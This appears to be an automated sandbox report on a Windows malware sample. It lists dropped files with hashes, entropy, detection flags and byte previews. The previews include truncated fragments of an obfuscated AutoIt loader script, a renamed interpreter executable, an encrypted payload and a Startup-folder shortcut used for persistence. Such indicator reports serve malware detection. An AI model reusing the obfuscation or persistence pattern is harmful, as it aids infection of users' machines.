                                                  SHA-256:2392619F397925A165CF31634781D68B006C396611C425F6C67F338356E47F8F
                                                  SHA-512:36EF55C7B0BEAA825AB7B3A509BDD6154BE0039BF5ADD56232ECDA2237C277F4FED64235F809CCA1DC2370DA4664D8C2013A9F3EA8FB6972238EF0B10A6790E6
                                                  Malicious:false
                                                  Preview: ........
                                                  C:\Users\user\AppData\Local\Temp\chr1073.tmp
                                                  Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                  Category:dropped
                                                  Size (bytes):6962
                                                  Entropy (8bit):2.4957564851494354
                                                  Encrypted:false
                                                  SSDEEP:24:QXs0kWA9NPjqFcyFchmPLPmEfS6U6UOOOOWOOOOOOOOOOOOP8sOOOOOOOOOOOOOL:KfXQEX9h8qAz/q4hfSYZnClU
                                                  MD5:F9D527CEF22C29BCAC626EAFF4201DAB
                                                  SHA1:D2925316040A2382BF760C3D2EE324DB17C67CCC
                                                  SHA-256:9024A75A428327B4A85E4BF616C2B968A8ECA00CFC677F1A90C5C367AC5C50F8
                                                  SHA-512:36646450F7E68DE7FE327F368965B7C8E913565526F7D9B69EACC91F6ECC2A95A4CCD28BDE818C57787390C95A29D74A4952CB539A2980FAC76A085EEB9A4EF5
                                                  Malicious:false
                                                  Preview: ..N.a.m.e. . . . . . . . . . . . . . . . . . . . . . . . .....S.y.s.t.e.m. .I.d.l.e. .P.r.o.c.e.s.s. . . . . . . . . .....S.y.s.t.e.m. . . . . . . . . . . . . . . . . . . . . . .....R.e.g.i.s.t.r.y. . . . . . . . . . . . . . . . . . . . .....s.m.s.s...e.x.e. . . . . . . . . . . . . . . . . . . . .....c.s.r.s.s...e.x.e. . . . . . . . . . . . . . . . . . . .....w.i.n.i.n.i.t...e.x.e. . . . . . . . . . . . . . . . . .....c.s.r.s.s...e.x.e. . . . . . . . . . . . . . . . . . . .....s.e.r.v.i.c.e.s...e.x.e. . . . . . . . . . . . . . . . .....w.i.n.l.o.g.o.n...e.x.e. . . . . . . . . . . . . . . . .....l.s.a.s.s...e.x.e. . . . . . . . . . . . . . . . . . . .....f.o.n.t.d.r.v.h.o.s.t...e.x.e. . . . . . . . . . . . . .....f.o.n.t.d.r.v.h.o.s.t...e.x.e. . . . . . . . . . . . . .....s.v.c.h.o.s.t...e.x.e. . . . . . . . . . . . . . . . . .....s.v.c.h.o.s.t...e.x.e. . . . . . . . . . . . . . . . . .....s.v.c.h.o.s.t...e.x.e. . . . . . . . . . . . . . . . . .....s.v.c.h.o.s.t...e.x.e. . . . . . . . .
                                                  C:\Users\user\AppData\Local\Temp\chr2302.tmp
                                                  Process:C:\Windows\SysWOW64\makecab.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):1924
                                                  Entropy (8bit):7.865672899473467
                                                  Encrypted:false
                                                  SSDEEP:48:xFiYUJf0QjN/JHrNeH0rRIRfCMHc2QvVGQH:xFlwf0QjheH8kHc1V5
                                                  MD5:93E86307587E6C2A2C3F25DB6C3A8C34
                                                  SHA1:157561344ABA59BCED8BC4329918951FECE872D2
                                                  SHA-256:2DCF0197EFE740AB55785AC8ADE300796B2ED5CFFBD0B0C764AC7DEE517D2912
                                                  SHA-512:E03D49E472FC224A151961E8850214FB6B94F5A05024E3198E0DE7127C3E6DF1903B46331BBE2ADC126257B09A71B5151FEEAF479099BC07559E400B7F765861
                                                  Malicious:false
                                                  Preview: !CAB............,...................e..................R}V .4624a8e10d6df3306e1dd46223b6b1968208dd49.L.......CK.X..6....9).-..>..`..$.Lf. ...,.uqt).;...rW...Y._.G.M..!U.\..Q....I...4Z.t......W..Q..........u..vww...m...5.....n._....f.Z?.;.....~.e..wi..........z{......~{.'v...}.t...P.&......Z....U.f...Jo.n....&..CL?<~....|N.....h.|.B;U..r.j'd&`g....Z[0"."GAA..K2.V..pX..D#.X.o*P.'.R..+...........^...O.g$K.....?5M..7D.a.R........f.&.Y9....\H...=K.PQ..F.R#...(SH.[..Y.5]6b.68.z...5l.B:....N....l...)...3W.b.........M.|.e........N..K.}nd..r..........o.f...*chV5.`).%iE.U...$S.#Q.rT.O...'.....d)J9.b.I.E./.I_ION'iEA..b.`..Pupq..~....?-.D...O...}.y]...j.'..5.c.S..S.\@{.X........#r.>.....k..i./....Gv.3.....v.vk.W..*.-...*.f.....>.J%.2_..W..........3..V.9...MC.B...-.wi[.bs...;.O.Q,....d...S.....i)...W...HEC..-.N.PF...N$T9U.R..*.:...@?.WK14.c.|~..xY(...d.."...|@g"HX...*.{E..+.....qa..{.1...i.qu...>.Yh.jO.|.v....=x....9.d[5.D.D.{..r........}C.@3F-.e+H...D.bT..
                                                  C:\Users\user\AppData\Local\Temp\chrB32.tmp
                                                  Process:C:\Windows\SysWOW64\nslookup.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                  Category:dropped
                                                  Size (bytes):475136
                                                  Entropy (8bit):6.849448907791375
                                                  Encrypted:false
                                                  SSDEEP:12288:6tMaF5RxR/hezNwSiKeryu2fBpe+R7q5JmlG:8lmfipyu22WcmlG
                                                  MD5:BBB6A426B60C6A2F63EF024B760E841A
                                                  SHA1:BE39F0CFF6250813D9E7A2E8704C4CA2857D76B8
                                                  SHA-256:ED609C4EBA6C25D93CDBF722385BC3548F3D6DCCAAFF6A0FA41FF00A7ADC4769
                                                  SHA-512:BC9BF96B3B908AC5284CFEE7755728E631EBE61AC5CE637FC392F1916D345A1677E6CB0FB7139905553FDFAE33C05B8A351C6B6CFDB9BF6334AEDEE78C93BBAE
                                                  Malicious:false
                                                  Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\chrCF8.tmp
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):44
                                                  Entropy (8bit):4.436260027531528
                                                  Encrypted:false
                                                  SSDEEP:3:73KRjyM1KW28OLa1:73uj1a8Oe1
                                                  MD5:B29BF38565243D324A1E41E6046BB066
                                                  SHA1:E7D4C557CB8FB5B00C94CA7F8E3ADD6060F087FA
                                                  SHA-256:4B6F66EFB4919A346C9BDB937423F2D808C9EDB56ADE794D8FA4A9B45D7FEFF2
                                                  SHA-512:82B067B479BC4C5AC440027D325DBB9E5DC59CF3EA417D07782D09EE7C9AA1600656652A1B4C5F9CFBD65575C6E66884EEE73A1675AC50215DD86360F7F0B1A4
                                                  Malicious:false
                                                  Preview: ..Microsoft Windows [Version 10.0.17134.1]..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juROhmfLml.url
                                                  Process:C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
                                                  File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Roaming\zPgFqFUsML\wAYZqHgYEOdcYU.js>), Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):178
                                                  Entropy (8bit):3.632033496124056
                                                  Encrypted:false
                                                  SSDEEP:3:Q+2lRQuRkiglZlo14tGjLlAdVdhOEjl3QlMIolCl7nel1WGjXFQLlPK:Q+2lJglZyKhXUEZglJPZ6cGjX+w
                                                  MD5:53B7CB2641E4A572F1355EA8002117E9
                                                  SHA1:7195D9973A7E8F1573207DF7C241132DDE6672DC
                                                  SHA-256:7E09B82661650D0A9BA4BE0AE17D48969486F0468B28E587560547FC82BCB3E9
                                                  SHA-512:1B57BAF767B330C3BBC6DF4A51B3BA670F4B115B76216C32DD8A10B3792FB10E653FC55766CEF21C5DDF5738EB3972513351D1C1CB96516BC825E09913B089DB
                                                  Malicious:true
                                                  Preview: ..[.I.n.t.e.r.n.e.t.S.h.o.r.t.c.u.t.].....U.R.L.=.".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.z.P.g.F.q.F.U.s.M.L.\.w.A.Y.Z.q.H.g.Y.E.O.d.c.Y.U...j.s.".
                                                  C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Che.vsd
                                                  Process:C:\Users\user\Desktop\WDnE51mua6.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):943908
                                                  Entropy (8bit):6.625720682723327
                                                  Encrypted:false
                                                  SSDEEP:24576:/Js7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:/C7hGOSPT/PxebaiO
                                                  MD5:A7DDD4D4067D7E404D579AE32DC91542
                                                  SHA1:4203587509050293E0D1C8F833545230BB3355B0
                                                  SHA-256:548E87E6B13CDDA866CCC0A125B4EEAB7879C2AE0FCAC20073AC953D2F682729
                                                  SHA-512:1801871BFEC0C7BEB62B37B4BDAEE8733B9204594E4481647EFC476B819C8BE06FD1F2E88D99F8C62CA9C86BF91F2270C5C01E0950C160364F3F78171208B1F9
                                                  Malicious:false
                                                  Preview: nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS........................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B....................................................................................................................................................
                                                  C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\D
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                                                  Category:dropped
                                                  Size (bytes):981247
                                                  Entropy (8bit):5.794859181755685
                                                  Encrypted:false
                                                  SSDEEP:12288:jHbCI8BQ1Qtm8TIrJ62GM86zVIrwDbUOCMu/J1HDQned:j38BQ1Km80rJXIcDbUOCMu/5
                                                  MD5:870E342CA1600B86242061A18E7819E8
                                                  SHA1:D2515EA2681B02C6A4B1C87BCC2C7594FC836EF3
                                                  SHA-256:4F86DBE6A04B7483CE39E3C48BF05F19D9C3E285AC8C47E10DF4D958942AE788
                                                  SHA-512:3C497CDF3A7DBB622C7CE172A394D3F5FC2A86E67D8A36A84E30370357A6229F91570E87A585B32CB07328952E3438F5CD427B600E2A16A041859AE02DBB78A8
                                                  Malicious:false
                                                  Preview: $DXAuPuobCVxGA = WFzUldrKAarEmh("129$113$97$77$120$97$96$118$86$123$119$121$128$84$128$89",7)..#NoTrayIcon....Func zpoFKPJyvwDqkfo($akJfF,$ARNgA,$QVUW,$icjrS)..Local $AClkghUNqPGcrpWIOWAoZGyJrVoNnfaBtIJLfFnwFaPyhBhXmDgVGwXT = 'AoztigLvtsxmlaobmDGQZcCHkhUqvUrKQgPbyWnrrIppSbgkuninsevtFLTTxLqpgKJVDLaDyCMdjaPNZJUYNEaNSKRzrEJaIZVoNzIxyEzPfyShWyUKQwvJsWrTTYmASxIhvHqGwmSpkDbMREbXJYCHDjQQfPAutSWVbFQfygJsojbNmdwfBCRTRq'..Local $lQpdkYLyzHBgjOiRcglndPesYNkFBwervVGnWXbavi = WFzUldrKAarEmh("118$113$81$120$71$100$72$101$86$103$108$77$89$101$85$86$122$115$80$90$125$90$92$78$110$85",3)..Local $bvUCkKtGZFdDKBmpnzKOYNPApISnxmeVMNiwX = 'WYRRRjLGwxUNAsBeGJHzaDSFkmDxQXxnjJvLXiWCPCHbEHZLxKubzDczujFsJdPrqcBQUPymNyEQVcwEARquQWyIgrELBETnMDvouoREFHKgZFbLlwRRfJhrdSCQlxXokuraYSbsqvApjQIIGTAANwordzShGqzlJBeTCyNsDmRTotRmlTlsTbxlXZeFqlLZedmLNPuAupXglfUkBarMQesjuSVCrodzNRQSEyMxNJkKAuqIyQrIuZpqYjEVTEb'...$UKEvSZ = 122..$DIOJIVMLvhqX = 60..While ((9888-9887)*9427)..Switch $UKEvSZ..Case 119....$vecSUxObrDgqlvL = Execut
                                                  C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
                                                  Process:C:\Windows\SysWOW64\findstr.exe
                                                  File Type:Targa image data - Mono 65536 x 184 x 0 +65535 ""
                                                  Category:modified
                                                  Size (bytes):943782
                                                  Entropy (8bit):6.625457835020965
                                                  Encrypted:false
                                                  SSDEEP:24576:IJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:IC7hGOSPT/PxebaiO
                                                  MD5:DAB8F26DB6E8D76655D96B463513CE6A
                                                  SHA1:EA9C3631F94233C06750776CD9BD18E27FBD8677
                                                  SHA-256:549D70CF61A50E8970E274BF7E76F4C9FAB1E185189A8AD074E2A5BDEA39005B
                                                  SHA-512:E406093EB802A5EDBDC0E5F0A849D7F58F10DDED413DB9B6E0A4788125BA73C5B90F5D42A5D98AC68BA2E1FC01879C1403F32CFB3D8E5C26231C58E9751C2093
                                                  Malicious:true
                                                  Preview: ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B..................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Lineamento.vsd
                                                  Process:C:\Users\user\Desktop\WDnE51mua6.exe
                                                  File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                                                  Category:dropped
                                                  Size (bytes):981247
                                                  Entropy (8bit):5.794859181755685
                                                  Encrypted:false
                                                  SSDEEP:12288:jHbCI8BQ1Qtm8TIrJ62GM86zVIrwDbUOCMu/J1HDQned:j38BQ1Km80rJXIcDbUOCMu/5
                                                  MD5:870E342CA1600B86242061A18E7819E8
                                                  SHA1:D2515EA2681B02C6A4B1C87BCC2C7594FC836EF3
                                                  SHA-256:4F86DBE6A04B7483CE39E3C48BF05F19D9C3E285AC8C47E10DF4D958942AE788
                                                  SHA-512:3C497CDF3A7DBB622C7CE172A394D3F5FC2A86E67D8A36A84E30370357A6229F91570E87A585B32CB07328952E3438F5CD427B600E2A16A041859AE02DBB78A8
                                                  Malicious:false
                                                  Preview: $DXAuPuobCVxGA = WFzUldrKAarEmh("129$113$97$77$120$97$96$118$86$123$119$121$128$84$128$89",7)..#NoTrayIcon....Func zpoFKPJyvwDqkfo($akJfF,$ARNgA,$QVUW,$icjrS)..Local $AClkghUNqPGcrpWIOWAoZGyJrVoNnfaBtIJLfFnwFaPyhBhXmDgVGwXT = 'AoztigLvtsxmlaobmDGQZcCHkhUqvUrKQgPbyWnrrIppSbgkuninsevtFLTTxLqpgKJVDLaDyCMdjaPNZJUYNEaNSKRzrEJaIZVoNzIxyEzPfyShWyUKQwvJsWrTTYmASxIhvHqGwmSpkDbMREbXJYCHDjQQfPAutSWVbFQfygJsojbNmdwfBCRTRq'..Local $lQpdkYLyzHBgjOiRcglndPesYNkFBwervVGnWXbavi = WFzUldrKAarEmh("118$113$81$120$71$100$72$101$86$103$108$77$89$101$85$86$122$115$80$90$125$90$92$78$110$85",3)..Local $bvUCkKtGZFdDKBmpnzKOYNPApISnxmeVMNiwX = 'WYRRRjLGwxUNAsBeGJHzaDSFkmDxQXxnjJvLXiWCPCHbEHZLxKubzDczujFsJdPrqcBQUPymNyEQVcwEARquQWyIgrELBETnMDvouoREFHKgZFbLlwRRfJhrdSCQlxXokuraYSbsqvApjQIIGTAANwordzShGqzlJBeTCyNsDmRTotRmlTlsTbxlXZeFqlLZedmLNPuAupXglfUkBarMQesjuSVCrodzNRQSEyMxNJkKAuqIyQrIuZpqYjEVTEb'...$UKEvSZ = 122..$DIOJIVMLvhqX = 60..While ((9888-9887)*9427)..Switch $UKEvSZ..Case 119....$vecSUxObrDgqlvL = Execut
                                                  C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Poi.vsd
                                                  Process:C:\Users\user\Desktop\WDnE51mua6.exe
                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):119603
                                                  Entropy (8bit):5.771907667395008
                                                  Encrypted:false
                                                  SSDEEP:3072:DXE3yUMc+GICKE3zGnF8potFOFDgXZ4S0qc2Tl:jBciCKEkKpSOF0poqc2Tl
                                                  MD5:F96668D6E644D2D131C7C1B0E3465733
                                                  SHA1:AF552D39A5ABD94E61CBC5CB18B0A35A9039573A
                                                  SHA-256:EFFD096DF32E053A1926A58330D7AF2A369AD630B0ECC69C162473140773D67E
                                                  SHA-512:61C2161EAFCDB928EF1652712333B087E1D2C2C154B619E24BE5ACED6F5E12B3D9E6D11E7774D3DE23FE2BDD231D1193157DCAC30C392843198EFCE4106982E4
                                                  Malicious:false
                                                  Preview: gsbekfEpcPdLxwEGOzyfkLWYOpNQeLgmykCGtyKlKlWHdYoxwfppjYdCcmgeCOiJBQ=onXBJJVFwPgHPqzONBthiUqlFRIHVrjyAzZVrOAAdafNuRnwpqxovDnhnNWRqgJXCouvwbKYqEWOFjrNaGbVJtJXUMvdSJmeIalXLeqMfciSGKIkJomxQOgnmpBfqxustTyheuedGLGgWQdlrkHJlykU..LnBALLUgQOMFcpDupNyoqCISskPNbiYIlpdHAPVZLZyeDFIwtDws=MrpPIpmWiRJPtxkTVFzSybqvGfLCNITuHBnyiSRFcrDovhnkbooYHnqfrMpzbXomXDiDVuLrNNbeTRqzQAyFmVnoBpwxIn..bUtlSyVfdvylTwXckLQDWSCZetZwMtsxfFZiPHihUkOpxKFiDOQISU=FayoOuUDjyLVheQGEECILrzFsmRbYgIBxxzPJnziqICtIPstNiktdkACYARggvFXblATIqWukcIeBfWCoNKQeDloTRQpHtSErEGngbcMky..VDbwJDguBLOVTZsqRpMnuCtZWIbgKsXFWKfFcQiGaXsSgJNmWbEDnGMamntwyqvlNpYoJMEweuu=kkLhUYsjNxudYXuXLuAsButyKEPpTCAaADuhNRuiJpvzeIlMGGfWFPHtiFCdoizlUOPcQTlUqaIaJLeexrDjjEMKVeyigQZBPjng..OWMvcWhufxcDAVtDuXdwymNNrFpzuCbjOpGiQQRHmEGHJEOUUXIgohNgoZaPMUZMXpPdfXNduIB=TurmRfnpTorAvsYRbeVFETKAObFWlaoALjcwWTXbcQTOugUXZVSrMWWZcCKzJCZBqCPpVWUEtnpNqWxADHXgmtOOdcGzpENTRsODnLwewgZhMoZmopQwEKwVOqTAdBcALdWIoReRGUhkyA..ivukZNMgudSObRBMmTmCvjdssiYcKbPQgYMrldcNYwQafeEqtoN=FXFVuOUSOdDIBeAmy
                                                  C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Veduto.vsd
                                                  Process:C:\Users\user\Desktop\WDnE51mua6.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):339968
                                                  Entropy (8bit):7.999506483828205
                                                  Encrypted:true
                                                  SSDEEP:6144:9Y1gdVDxnSxQBbHnCXQGRW5XYyM+8Rfc34BuH7FKaKW53vya5XU1:9NvDxnSIqQsmYyN/oBm7FKtw3M1
                                                  MD5:B4B043FBDA464D018EF01CEA7CEE7303
                                                  SHA1:2B21F85669E9EE021A0805A1D802760993F86957
                                                  SHA-256:63BC2CA795DA615CDFE6A0DCD3D65944632FE0013D452CAFC3016165A762BF2A
                                                  SHA-512:BF6AF2FA5A1FD5D22C5F142C86FB167D9C849F3A294464375920EEA19CB1DD5068628C846B63B364E00BC1504EDDEF32FB6BBE1C1BEF7131248F8E291223A29E
                                                  Malicious:false
                                                  Preview: .<.8.~...j....Q..-..'._;n{..c..OO..P.8=[[p.....G.~..^."..2m.....2uJ.....3.qs. ...'...a.....U~.(W..^......p.H....D4_h~m$@p=.i.=..F..gh..=*.........:.X.S2:p..L1S..x....3......"...sWZtT.Qr."P4.......d.........o...B.s...........)[.............J..Z.$...%{....g..o.:(....)o.Su=hn....i.x.....)..O.AWC..MAP.bIQ.{:....Xv3...C...[Q..0.....H2....1.;a.8m..J......'....!w..........u......(.?...@....A.l......E..^..]...... AL.H.......Z.4...m~..A.c^.......3._Y_......O....%W[..A.!.......e.k..[4....".5m6...1 l..|...$..m....y..p.r.T....f....T.......S.nH......*l...S...J..j...,P>hl..2.-....=.....IV.e.`._.h....P...\.....".....3......9..:e..`..6.B..g.eS|x..<...KB.a#'......u..........A...|.x... .....z#..>....#..f.......8J.....r.~.5.s........@....../..V..h|..V..gs0.\...t.2f.N...n..P8.<#.....fn..Y..iK.....[yI ...F........k.xan......S.Y(vc..%...S.q.F...y...(o...`&....S.M...X..]...f.=...f............<.A?...#@.j..H.....].'..R.......H.>V .%q...:.iu9....../1.......
                                                  C:\Users\user\AppData\Roaming\zPgFqFUsML\I
                                                  Process:C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
                                                  File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                                                  Category:dropped
                                                  Size (bytes):981247
                                                  Entropy (8bit):5.794859181755685
                                                  Encrypted:false
                                                  SSDEEP:12288:jHbCI8BQ1Qtm8TIrJ62GM86zVIrwDbUOCMu/J1HDQned:j38BQ1Km80rJXIcDbUOCMu/5
                                                  MD5:870E342CA1600B86242061A18E7819E8
                                                  SHA1:D2515EA2681B02C6A4B1C87BCC2C7594FC836EF3
                                                  SHA-256:4F86DBE6A04B7483CE39E3C48BF05F19D9C3E285AC8C47E10DF4D958942AE788
                                                  SHA-512:3C497CDF3A7DBB622C7CE172A394D3F5FC2A86E67D8A36A84E30370357A6229F91570E87A585B32CB07328952E3438F5CD427B600E2A16A041859AE02DBB78A8
                                                  Malicious:false
                                                  Preview: $DXAuPuobCVxGA = WFzUldrKAarEmh("129$113$97$77$120$97$96$118$86$123$119$121$128$84$128$89",7)..#NoTrayIcon....Func zpoFKPJyvwDqkfo($akJfF,$ARNgA,$QVUW,$icjrS)..Local $AClkghUNqPGcrpWIOWAoZGyJrVoNnfaBtIJLfFnwFaPyhBhXmDgVGwXT = 'AoztigLvtsxmlaobmDGQZcCHkhUqvUrKQgPbyWnrrIppSbgkuninsevtFLTTxLqpgKJVDLaDyCMdjaPNZJUYNEaNSKRzrEJaIZVoNzIxyEzPfyShWyUKQwvJsWrTTYmASxIhvHqGwmSpkDbMREbXJYCHDjQQfPAutSWVbFQfygJsojbNmdwfBCRTRq'..Local $lQpdkYLyzHBgjOiRcglndPesYNkFBwervVGnWXbavi = WFzUldrKAarEmh("118$113$81$120$71$100$72$101$86$103$108$77$89$101$85$86$122$115$80$90$125$90$92$78$110$85",3)..Local $bvUCkKtGZFdDKBmpnzKOYNPApISnxmeVMNiwX = 'WYRRRjLGwxUNAsBeGJHzaDSFkmDxQXxnjJvLXiWCPCHbEHZLxKubzDczujFsJdPrqcBQUPymNyEQVcwEARquQWyIgrELBETnMDvouoREFHKgZFbLlwRRfJhrdSCQlxXokuraYSbsqvApjQIIGTAANwordzShGqzlJBeTCyNsDmRTotRmlTlsTbxlXZeFqlLZedmLNPuAupXglfUkBarMQesjuSVCrodzNRQSEyMxNJkKAuqIyQrIuZpqYjEVTEb'...$UKEvSZ = 122..$DIOJIVMLvhqX = 60..While ((9888-9887)*9427)..Switch $UKEvSZ..Case 119....$vecSUxObrDgqlvL = Execut
                                                  C:\Users\user\AppData\Roaming\zPgFqFUsML\Veduto.vsd
                                                  Process:C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):339968
                                                  Entropy (8bit):7.999506483828205
                                                  Encrypted:true
                                                  SSDEEP:6144:9Y1gdVDxnSxQBbHnCXQGRW5XYyM+8Rfc34BuH7FKaKW53vya5XU1:9NvDxnSIqQsmYyN/oBm7FKtw3M1
                                                  MD5:B4B043FBDA464D018EF01CEA7CEE7303
                                                  SHA1:2B21F85669E9EE021A0805A1D802760993F86957
                                                  SHA-256:63BC2CA795DA615CDFE6A0DCD3D65944632FE0013D452CAFC3016165A762BF2A
                                                  SHA-512:BF6AF2FA5A1FD5D22C5F142C86FB167D9C849F3A294464375920EEA19CB1DD5068628C846B63B364E00BC1504EDDEF32FB6BBE1C1BEF7131248F8E291223A29E
                                                  Malicious:false
                                                  Preview: .<.8.~...j....Q..-..'._;n{..c..OO..P.8=[[p.....G.~..^."..2m.....2uJ.....3.qs. ...'...a.....U~.(W..^......p.H....D4_h~m$@p=.i.=..F..gh..=*.........:.X.S2:p..L1S..x....3......"...sWZtT.Qr."P4.......d.........o...B.s...........)[.............J..Z.$...%{....g..o.:(....)o.Su=hn....i.x.....)..O.AWC..MAP.bIQ.{:....Xv3...C...[Q..0.....H2....1.;a.8m..J......'....!w..........u......(.?...@....A.l......E..^..]...... AL.H.......Z.4...m~..A.c^.......3._Y_......O....%W[..A.!.......e.k..[4....".5m6...1 l..|...$..m....y..p.r.T....f....T.......S.nH......*l...S...J..j...,P>hl..2.-....=.....IV.e.`._.h....P...\.....".....3......9..:e..`..6.B..g.eS|x..<...KB.a#'......u..........A...|.x... .....z#..>....#..f.......8J.....r.~.5.s........@....../..V..h|..V..gs0.\...t.2f.N...n..P8.<#.....fn..Y..iK.....[yI ...F........k.xan......S.Y(vc..%...S.q.F...y...(o...`&....S.M...X..]...f.=...f............<.A?...#@.j..H.....].'..R.......H.>V .%q...:.iu9....../1.......
                                                  C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com
                                                  Process:C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):943784
                                                  Entropy (8bit):6.625461630496363
                                                  Encrypted:false
                                                  SSDEEP:24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
                                                  MD5:78BA0653A340BAC5FF152B21A83626CC
                                                  SHA1:B12DA9CB5D024555405040E65AD89D16AE749502
                                                  SHA-256:05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
                                                  SHA-512:EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 2%
                                                  Joe Sandbox View:
                                                  • Filename: yPkfbflyoh.exe, Detection: malicious, Browse
                                                  • Filename: JYDy1dAHdW.exe, Detection: malicious, Browse
                                                  • Filename: EppTbowa74.exe, Detection: malicious, Browse
                                                  • Filename: tcNbszVulx.exe, Detection: malicious, Browse
                                                  • Filename: USHrlfZEJC.exe, Detection: malicious, Browse
                                                  • Filename: mcRrjT7JMX.exe, Detection: malicious, Browse
                                                  • Filename: 3MWIYkDesa.exe, Detection: malicious, Browse
                                                  • Filename: 3MWIYkDesa.exe, Detection: malicious, Browse
                                                  • Filename: MmuRNUcd2B.exe, Detection: malicious, Browse
                                                  • Filename: 23j6ZPLfOh.exe, Detection: malicious, Browse
                                                  • Filename: 23j6ZPLfOh.exe, Detection: malicious, Browse
                                                  • Filename: tl2uliYxhr.exe, Detection: malicious, Browse
                                                  • Filename: xARcpdYdew.exe, Detection: malicious, Browse
                                                  • Filename: vtg3HBN11U.exe, Detection: malicious, Browse
                                                  • Filename: 01FRraMfKS.exe, Detection: malicious, Browse
                                                  • Filename: PzmkDJz80S.exe, Detection: malicious, Browse
                                                  • Filename: dq1pzC7LNO.exe, Detection: malicious, Browse
                                                  • Filename: atikmdag-patcher 1.4.7.exe, Detection: malicious, Browse
                                                  • Filename: hfix.exe, Detection: malicious, Browse
                                                  • Filename: atikmdag-patcher 1.4.8.exe, Detection: malicious, Browse
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Roaming\zPgFqFUsML\wAYZqHgYEOdcYU.js
                                                  Process:C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):284
                                                  Entropy (8bit):4.908017768163253
                                                  Encrypted:false
                                                  SSDEEP:6:5AKIH8CYM2h2sUS4tRZDeLPqJI5FkPr2wNeLPqJI5Fka9FWDeLPqJI5Fk4p:5zS6R4t7Yw2wauY1
                                                  MD5:893005367A38C097BD1AC6910453EAEB
                                                  SHA1:964EB1DAC2C6333E71853DE5DDE9017E4500A2EA
                                                  SHA-256:E973A295696760D5CFCAAC0C713D0DB9B1D7493F243E62C4C58AEFCA8A0603D6
